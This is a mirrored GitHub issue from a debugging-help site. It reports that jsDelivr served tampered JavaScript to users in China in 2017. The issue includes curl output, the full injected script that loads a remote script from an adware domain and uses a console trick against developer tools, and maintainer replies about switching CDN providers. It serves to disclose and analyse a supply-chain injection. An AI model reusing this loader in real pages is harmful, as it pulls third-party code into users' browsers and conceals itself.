Lightrun
question-mark
Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

jsdelivr was poisoned, China 11-03-2017

See original GitHub issue
$ curl https://cdn.jsdelivr.net/gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js -v
*   Trying 101.66.227.63...
* TCP_NODELAY set
* Connected to cdn.jsdelivr.net (101.66.227.63) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Client hello (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: OU=Domain Control Validated; OU=PositiveSSL; CN=cdn.jsdelivr.net
*  start date: Apr 20 00:00:00 2014 GMT
*  expire date: Apr 19 23:59:59 2019 GMT
*  subjectAltName: host "cdn.jsdelivr.net" matched cert's "cdn.jsdelivr.net"
*  issuer: C=GB; ST=Greater Manchester; L=Salford; O=COMODO CA Limited; CN=COMODO RSA Domain Validation Secure Server CA
*  SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7f9e9c00aa00)
> GET /gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js HTTP/2
> Host: cdn.jsdelivr.net
> User-Agent: curl/7.54.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 200
< date: Thu, 02 Nov 2017 18:49:08 GMT
< content-type: application/x-javascript
< content-length: 682
< cache-control: max-age=604800
< age: 1
< x-via: 1.1 tongwangtong17:3 (Cdn Cache Server V2.0), 1.1 angtong122:10 (Cdn Cache Server V2.0)
<

* Connection #0 to host cdn.jsdelivr.net left intact
(function(){try{var e="_z__",t="http://cdn.jsdelivr.net//gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js",r="http://xf.yellowto.com/?tsliese=27312832",c=document,n=c.currentScript,a=c.getElementsByTagName("head")[0],i=function(e,t){var r=c.createElement("script");r.type="text/javascript",t&&(r.id=t),r.src=e,a.appendChild(r)},s=setInterval(function(){var e=new Image,t=window.console;Object.defineProperty(e,"id",{get:function(){e.referrerPolicy="no-referrer",e.src="http://app.baidu.com/?d?",clearInterval(s)}}),t&&(t.log(e),t.clear())},2e3);c.getElementById(e)||self==top&&i(r,e),n&&(n.defer||n.async)?i(t):c.write('<script src="'+t+'"><\/script>')}catch(e){}})()%

The domain appears there “xf.yellowto.com”, is an adware website, According to the request is via https, Please allow me(original post author) to guess:

  1. jsdelivr team themselves did this,
  2. ChinaNetCenter(aka, wangsu in Chinese) did this( quantl is a share holded by ChinaNetCenter, and also, the cdn datacenter operation work is belongs to ChinaNetCenter actually. )
  3. CDN streaming to origin is insecure protocol such as HTTP non-over TLS, and poisoned by China Cyber Army?

Original post: https://www.v2ex.com/t/403110

Issue Analytics

  • State:closed
  • Created 6 years ago
  • Comments:18 (8 by maintainers)

github_iconTop GitHub Comments

2reactions
jimaekcommented, Nov 2, 2017

I know that. I am waiting for an answer from Quantil first to decide what to do next. I have not confirmed anything yet. I switched to Cloudflare as a precaution.

I will keep you posted.

1reaction
jimaekcommented, Nov 9, 2017

Quantil was enabled again in China. Origin -> Quantil communication is encrypted too.

Read more comments on GitHub >

github_iconTop Results From Across the Web

jsDelivr - A free, fast, and reliable CDN for open source
Supports npm, GitHub, WordPress, Deno, and more. Largest network and best performance among all CDNs. Serving more than 80 billion requests per month....
Read more >
"cdn jsdelivr net" has been blocked in China, is there any ...
URL of experiment: Description of the problem: “cdn jsdelivr net” has been blocked in China since May 17, 2022. The CSS style has...
Read more >
jsDelivr CDN on Twitter: "Unfortunately today jsDelivr ...
Unfortunately today jsDelivr unexpectedly lost its ICP license in China. As effect the regional CDN disabled our account. This resulted in the extended ......
Read more >
JSDelivr - Wikipedia
JSDelivr (stylized as jsDelivr) is a public content delivery network (CDN) for open-source software projects, including packages hosted on GitHub, npm, ...
Read more >

github_iconTop Related Medium Post

No results found

github_iconTop Related StackOverflow Question

No results found

github_iconTroubleshoot Live Code

Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free

github_iconTop Related Reddit Thread

No results found

github_iconTop Related Hackernoon Post

No results found

github_iconTop Related Tweet

No results found

github_iconTop Related Dev.to Post

No results found

github_iconTop Related Hashnode Post

No results found
Previous page

Some binary file types from /wp endpoint return 403 error

Next page

How to access the `@angular/core` npm package?